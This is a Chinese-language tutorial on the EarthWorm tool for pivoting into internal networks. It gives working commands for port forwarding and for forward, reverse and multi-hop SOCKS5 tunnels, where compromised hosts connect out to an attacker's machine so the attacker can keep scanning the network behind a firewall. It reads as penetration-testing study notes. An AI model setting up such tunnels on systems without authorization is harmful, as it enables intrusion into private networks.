[點(diǎn)晴永久免費(fèi)OA]EarthWorm(ew):復(fù)雜網(wǎng)絡(luò)環(huán)境下內(nèi)網(wǎng)穿透、端口轉(zhuǎn)發(fā)及SOCKS5代理工具
導(dǎo)讀 一句話說(shuō)明:復(fù)雜內(nèi)網(wǎng)下,數(shù)據(jù)轉(zhuǎn)發(fā),轉(zhuǎn)出轉(zhuǎn)入工具;常用于socks5代理,深度掃描內(nèi)網(wǎng); 官方:EarthWorm是一款用于開啟 SOCKS v5 代理服務(wù)的工具,基于標(biāo)準(zhǔn) C 開發(fā),可提供多平臺(tái)間的轉(zhuǎn)接通訊,用于復(fù)雜網(wǎng)絡(luò)環(huán)境下的數(shù)據(jù)轉(zhuǎn)發(fā)。 零、前言本文是在學(xué)習(xí)了下面參考文章的基礎(chǔ)上,基于自己的理解和心得補(bǔ)充了數(shù)據(jù)流量拓?fù)鋱D,這樣更好理解工具的使用場(chǎng)景和記住命令;本文僅作為技術(shù)交流。 一、要點(diǎn)先說(shuō)1、ew 自身的各個(gè)選項(xiàng)用途說(shuō)明 -l 指定要監(jiān)聽的本地端口 -d 指定要反彈到的機(jī)器ip -e 指定要反彈到的機(jī)器端口 -f 指定要主動(dòng)連接的機(jī)器ip -g 指定要主動(dòng)連接的機(jī)器端口 -t 指定超時(shí)時(shí)長(zhǎng),默認(rèn)為1000 2、正向代理和反向代理用途的區(qū)別 正向代理的典型用途是為在防火墻內(nèi)的局域網(wǎng)客戶端提供訪問(wèn)Internet的途徑。 反向代理的典型用途是將防火墻后面的服務(wù)器提供給Internet用戶訪問(wèn)。 3、rssocks 啟動(dòng)的socks5服務(wù),轉(zhuǎn)發(fā)到最后一步必須使用rcsocks接收 4、工具下載地址 http://rootkiter.com/EarthWorm/supportlist/
二、端口轉(zhuǎn)發(fā)功能場(chǎng)景一在攻擊機(jī)運(yùn)行工具,主動(dòng)連接靶機(jī)3389端口,并將靶機(jī)的3389映射到攻擊機(jī)本地1080端口;達(dá)到在攻擊機(jī)側(cè)訪問(wèn)本地1080端口,將數(shù)據(jù)轉(zhuǎn)發(fā)到靶機(jī)3389; ./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389 場(chǎng)景二攻擊機(jī)側(cè)運(yùn)行工具,做1080端口轉(zhuǎn)發(fā)本地8080端口,且8080端口接受外部連接;靶機(jī)將本地3389端口數(shù)據(jù)轉(zhuǎn)發(fā)到攻擊機(jī)8080端口; 第一步在本地電腦創(chuàng)建監(jiān)聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問(wèn)權(quán)限: ./ew -s lcx_listen -l 1080 -e 8080 第二步在遠(yuǎn)端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接,以及提供訪問(wèn)的其他電腦IP-10.0.0.1及端口3389(不一定要是此遠(yuǎn)端電腦,可以是此遠(yuǎn)端電腦能夠訪問(wèn)到的其他電腦IP和端口): ./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389 三、socks5代理功能場(chǎng)景一(正向代理)在靶機(jī)側(cè)運(yùn)行工具監(jiān)聽1080端口對(duì)外提供socks5代理服務(wù);在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接靶機(jī)提供的socks5代理服務(wù),繼續(xù)滲透掃描內(nèi)網(wǎng)。 ./ew -s ssocksd -l 1080 場(chǎng)景二(反向代理)靶機(jī)側(cè)運(yùn)行工具,本地啟動(dòng)socks5服務(wù),主動(dòng)外聯(lián)攻擊機(jī)8080端口,攻擊機(jī)側(cè)運(yùn)行工具,將對(duì)外訪問(wèn)的8080端口與到本地1080端口做映射,進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā); 第一步在本地電腦創(chuàng)建監(jiān)聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問(wèn)權(quán)限: ./ew -s rcsocks -l 1080 -e 8080 第二步在遠(yuǎn)端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接: ./ew -s rssocks -d 114.114.114.114 -e 8080 場(chǎng)景三(正向代理):靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具將本地從1080端口收到的數(shù)據(jù)全部轉(zhuǎn)發(fā)到靶機(jī)1086端口,在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接邊緣機(jī)提供的1080端口;最終達(dá)到攻擊機(jī)側(cè)與靶機(jī)之間形成socks5代理通道,繼續(xù)滲透掃描內(nèi)網(wǎng)。 第一步在遠(yuǎn)端靶機(jī)10.0.0.2上創(chuàng)建監(jiān)聽端口1086: ./ew -s ssocksd -l 1086 第二步在遠(yuǎn)端邊緣機(jī)上創(chuàng)建創(chuàng)建端口1080到靶機(jī)10.0.0.2端口1086的轉(zhuǎn)發(fā),防火墻和路由器需要開放遠(yuǎn)端邊緣機(jī)端口1080的訪問(wèn)權(quán)限: ./ew -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086 場(chǎng)景四(反向代理):靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具連接靶機(jī)1086端口并主動(dòng)外聯(lián)攻擊機(jī)8080端口;攻擊機(jī)側(cè)運(yùn)行工具,對(duì)外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<—>靶機(jī)之間形成一條代理通道; 第一步在遠(yuǎn)端靶機(jī)創(chuàng)建監(jiān)聽端口1086: ./ew -s ssocksd -l 1086 第二步在本地電腦上創(chuàng)建監(jiān)聽端口8080: ./ew -s lcx_listen -l 1080 -e 8080 第三步在遠(yuǎn)端邊緣機(jī)創(chuàng)建到本地電腦的連接: ./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086 場(chǎng)景五(反向代理)-復(fù)雜型多級(jí)聯(lián)接靶機(jī)側(cè)運(yùn)行工具本地啟動(dòng)socks5服務(wù)并反向連接中間機(jī)7777端口;中間機(jī)側(cè)運(yùn)行工具將9999端口與7777端口數(shù)據(jù)轉(zhuǎn)發(fā)互通;邊緣機(jī)側(cè)運(yùn)行工具,通過(guò)主動(dòng)外聯(lián)攻擊機(jī)8080端口將數(shù)據(jù)轉(zhuǎn)發(fā)到中間機(jī)9999端口;攻擊機(jī)側(cè)運(yùn)行工具,對(duì)外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<—>靶機(jī)之間形成一條代理通道; 第一步: ./ew -s lcx_listen -l 9999 -e 7777 第二步: ./ew -s rssocks -d 10.0.1.2 -e 7777 第三步: ./ew -s rcsocks -l 1080 -e 8080 第四步: ./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999 四、最后說(shuō)點(diǎn)什么1、耐下心來(lái) 剛開始看到這個(gè)工具本想一看而過(guò),后來(lái)耐心的學(xué)習(xí)一下,打開了新世界。 2、動(dòng)手實(shí)踐 看了很多文章也包括官方的文檔;發(fā)現(xiàn)對(duì)小白來(lái)說(shuō)想了解工具功能和不同場(chǎng)景,單看文字不直觀,沒(méi)有網(wǎng)絡(luò)拓?fù)浜茈y理解。所以本著自己邊學(xué)習(xí)邊記錄邊分享的精神,整理了這篇文章。 3、橫向比較 3.1 還發(fā)現(xiàn)了這個(gè)作者的另一個(gè)好用的工具Termite;目前EW和Termite作者已經(jīng)不維護(hù)了,工具下載方式如下: #git clone https://github.com/rootkiter/Binary-files.git #cd Binary-files #git checkout bd32230 HEAD 目前位于 bd32230 fix ew version #ls EarthWorm README.md Termite 其中Termite文件夾下面就是工具; 3.2 然后我在學(xué)習(xí)Termite的過(guò)程中又找到了一個(gè)和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom),我可以說(shuō)這兩個(gè)工具對(duì)我來(lái)說(shuō)可以算是“神器”了!因?yàn)楸酒攸c(diǎn)是介紹EW的使用方法,后面再根據(jù)情況,也記錄一下這兩個(gè)“神器”工具的使用; 感興趣的小伙伴可以學(xué)習(xí)一下Termite/Venom,玩起來(lái)挺爽。 參考文章:1、項(xiàng)目主頁(yè) http://rootkiter.com/EarthWorm/(附件:EarthWorm-master.zip) 2、內(nèi)網(wǎng)穿透的n種姿勢(shì) https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo 3、EW使用 https://blog.csdn.net/ws13129/article/details/94445378 4、內(nèi)網(wǎng)滲透入門到放棄之必備殺器 https://www.shangyouw.cn/win7/arc36509.html 5、Termite官方介紹說(shuō)明 http://rootkiter.com/Termite/README.txt https://github.com/rootkiter/Termite 6、Venom官方介紹說(shuō)明 https://github.com/Dliv3/Venom 該文章在 2023/10/21 16:58:18 編輯過(guò) |
關(guān)鍵字查詢
相關(guān)文章
正在查詢... |